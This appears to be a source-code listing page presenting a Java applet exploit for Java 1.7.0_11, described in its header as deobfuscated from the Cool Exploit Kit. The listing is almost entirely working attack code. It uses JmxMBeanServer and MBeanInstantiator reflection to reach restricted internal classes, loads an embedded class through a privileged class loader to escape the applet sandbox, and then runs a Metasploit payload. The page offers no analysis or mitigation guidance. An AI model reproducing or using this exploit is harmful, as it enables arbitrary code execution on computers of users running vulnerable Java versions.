Package

Source Code of Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
/*
*   From Paunch with love (Java 1.7.0_11 Exploit)
*
*   Deobfuscated from Cool EK by SecurityObscurity
*
*   https://twitter.com/SecObscurity
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;
import metasploit.Payload;

public class Exploit extends Applet
{

  public void init()
  {

    try
    {
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();

           // read in the class file from the jar
           InputStream is = getClass().getResourceAsStream("B.class");

           // and write it out to the byte array stream
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );

           // convert it to a simple byte array
           buffer = os.toByteArray();

          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");

          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          Method method1 = getMethod(class1, "createClassLoader", false);
          Object obj1 = method1.invoke(obj, new Object[1]);

          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
          Method method2 = getMethod(class2, "defineClass", false);

          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          my_class.newInstance();

          Payload.main(null);

    }
    catch (Throwable localThrowable){}

  }


   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;

      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
      }
    } catch (Exception localException) {  }

    return null;
  }

  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }

}

TOP

Related Classes of Exploit

  • com.sun.jmx.mbeanserver.JmxMBeanServer
  • com.sun.jmx.mbeanserver.JmxMBeanServerBuilder
  • com.sun.jmx.mbeanserver.MBeanInstantiator
  • com.sun.org.glassfish.gmbal.util.GenericConstructor
  • com.sun.tracing.Provider
  • com.sun.tracing.ProviderFactory
  • org.w3c.dom.svg.SVGSVGElement
  • javax.management.remote.rmi.RMIConnectionImpl
  • javax.management.MBeanServer
  • org.w3c.dom.events.EventListener
    • TOP
    Copyright © 2018 www.massapi.com. All rights reserved.
    All source code are property of their respective owners. Java is a trademark of Sun Microsystems, Inc and owned by ORACLE Inc. Contact coftware#gmail.com.